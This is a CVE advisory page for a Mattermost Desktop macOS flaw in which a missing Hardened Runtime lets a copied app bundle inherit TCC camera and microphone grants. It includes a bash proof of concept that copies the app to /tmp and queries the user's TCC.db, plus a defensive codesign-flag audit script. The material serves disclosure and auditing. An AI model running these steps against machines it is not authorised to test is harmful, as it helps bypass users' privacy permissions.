Security Vulnerability Report
CVE-2025-13326 CVSS 3.9 LOW

Published: 2025-12-17 19:16:01
Last Modified: 2025-12-18 19:47:07

Description

Mattermost Desktop App versions <6.0.0 fail to enable the Hardened Runtime on the Mattermost Desktop App when packaged for Mac App Store which allows an attacker to inherit TCC permissions via copying the binary to a tmp folder.

CVSS Details

CVSS Score
3.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_desktop:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost Desktop App < 6.0.0 (Mac App Store build)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-13326 PoC - Mattermost Desktop App TCC Permission Inheritance
# Demonstrates how a missing Hardened Runtime lets a copied bundle inherit
# the original's TCC grants. Applies to the Mac App Store build only
# (the direct-download build is out of scope for this CVE).

MATTERMOST_APP="/Applications/Mattermost.app"
WORK_DIR="/tmp/mattermost_poc_$$"
TEMP_DIR="$WORK_DIR/Mattermost.app"

echo "=== CVE-2025-13326 PoC ==="
echo "Target: Mattermost Desktop App < 6.0.0 (Mac App Store build)"
echo "Vulnerability: TCC Permission Inheritance via missing Hardened Runtime"
echo ""

# Step 1: Check if Mattermost is installed
if [ ! -d "$MATTERMOST_APP" ]; then
    echo "[-] Mattermost Desktop App not found at $MATTERMOST_APP"
    exit 1
fi
echo "[+] Found Mattermost Desktop App"

# Step 2: Check if Hardened Runtime is enabled.
# codesign writes its -d output to stderr, so redirect it before grepping;
# a hardened build shows "flags=0x10000(runtime)" on the CodeDirectory line.
codesign_result=$(codesign -d -v "$MATTERMOST_APP" 2>&1)
echo "[i] Code signature info:"
echo "$codesign_result"
if echo "$codesign_result" | grep -q 'flags=.*runtime'; then
    echo "[+] Hardened Runtime is enabled - build is NOT vulnerable to this issue"
else
    echo "[-] Hardened Runtime NOT enabled - build is VULNERABLE"
fi

# Step 3: Copy application to temp directory (simulating attack).
# TCC keys its grants on the bundle identifier and code-signing requirement,
# not on the on-disk path, so the copy is matched against the same entry.
echo ""
echo "[*] Simulating attack: Copying app to temp directory..."
mkdir -p "$WORK_DIR"
if cp -R "$MATTERMOST_APP" "$TEMP_DIR"; then
    echo "[+] Successfully copied Mattermost to $TEMP_DIR"
    echo "[i] The copied app may inherit TCC permissions from the original"
    echo "[i] This allows an attacker to access camera/mic without new authorization"
else
    echo "[-] Failed to copy application"
fi

# Step 4: Check TCC permissions.
# Reading the per-user TCC.db requires Full Disk Access for the terminal;
# without it sqlite3 prints nothing (its error output is discarded here).
echo ""
echo "[*] Checking TCC permissions for Mattermost..."
sqlite3 "$HOME/Library/Application Support/com.apple.TCC/TCC.db" \
    "SELECT client, service, auth_value FROM access WHERE client LIKE '%Mattermost%';" 2>/dev/null

# Cleanup
echo ""
echo "[*] Cleaning up..."
rm -rf "$WORK_DIR"
echo "[+] Done"
echo ""
echo "=== Remediation ==="
echo "Upgrade to Mattermost Desktop App >= 6.0.0"
echo "Ensure Hardened Runtime is enabled in production builds"
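The PoC above decides "hardened or not" with a single grep. The script below is an added example, not Mattermost's code and not part of the page's PoC: it parses the CodeDirectory flags field that `codesign -d -vvv` writes to stderr and reports whether the Hardened Runtime flag (`runtime`, 0x10000) and the library-validation flag (`library-validation`, 0x2000) are set. Hardened Runtime is what makes macOS refuse DYLD environment-variable injection and unsigned or foreign-team dylibs, so a bundle without it, copied anywhere on disk, still matches the same TCC entry (TCC keys on bundle identifier and code-signing requirement, not path) while lacking those protections. The bundle path, identifier and codesign output in the samples are constructed for the example, not captured from Mattermost; `audit_bundle` is this example's own helper and only works on macOS.

```shell
#!/bin/bash
# Added example (not Mattermost's code): audit a macOS app bundle for the
# signing flags relevant to CVE-2025-13326. `codesign -d -vvv` prints the
# CodeDirectory line to stderr; its flags field names "runtime" when the
# Hardened Runtime is enabled and "library-validation" when the app refuses
# dylibs signed by another team.

# Print the flags field (e.g. "0x10000(runtime)") from codesign output on stdin.
codesign_flags() {
  sed -n 's/^CodeDirectory .*flags=\([^ ]*\).*/\1/p' | head -n 1
}

# flag_set FLAGS NAME: exit 0 if the parenthesised list in FLAGS contains NAME.
# "0x12000(library-validation,runtime)" -> "library-validation,runtime".
flag_set() {
  names=$(printf '%s' "$1" | sed -n 's/^[^(]*(\(.*\))$/\1/p')
  case ",$names," in
    *",$2,"*) return 0 ;;
    *) return 1 ;;
  esac
}

# classify_flags FLAGS: prints "hardened+libval", "hardened" or "unhardened".
# An empty FLAGS (unsigned bundle, or no CodeDirectory line) is "unhardened".
classify_flags() {
  if flag_set "$1" runtime; then
    if flag_set "$1" library-validation; then
      echo "hardened+libval"
    else
      echo "hardened"
    fi
  else
    echo "unhardened"
  fi
}

# Live check against a real bundle (macOS only; codesign is not on Linux).
audit_bundle() {
  flags=$(codesign -d -vvv "$1" 2>&1 | codesign_flags)
  printf '%s: flags=%s verdict=%s\n' "$1" "${flags:-<unsigned>}" "$(classify_flags "$flags")"
}

# Constructed sample outputs in the format codesign prints. The path,
# identifier and sizes are invented for this example.
SAMPLE_UNHARDENED='Executable=/tmp/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x0(none) hashes=30+7 location=embedded'

SAMPLE_HARDENED='Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x12000(library-validation,runtime) hashes=30+7 location=embedded'

if [ $# -gt 0 ]; then
  audit_bundle "$1"
else
  printf 'sample unhardened: %s\n' "$(classify_flags "$(printf '%s\n' "$SAMPLE_UNHARDENED" | codesign_flags)")"
  printf 'sample hardened:   %s\n' "$(classify_flags "$(printf '%s\n' "$SAMPLE_HARDENED" | codesign_flags)")"
fi
```

Run it as `./audit.sh /Applications/Mattermost.app` on macOS to audit a real bundle; with no arguments it only classifies the embedded samples. A verdict of "hardened" without "libval" still means the app opted out of library validation through an entitlement, which is worth a second look (`codesign -d --entitlements :- App.app`).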

References

https://mattermost.com/security-updates (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13326", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:01.237", "lastModified": "2025-12-18T19:47:06.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost Desktop App versions <6.0.0 fail to enable the Hardened Runtime on the Mattermost Desktop App when packaged for Mac App Store which allows an attacker to inherit TCC permissions via copying the binary to a tmp folder."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_desktop:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "6DD607D2-5B4D-49F7-AB83-2DAD88C94DB8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}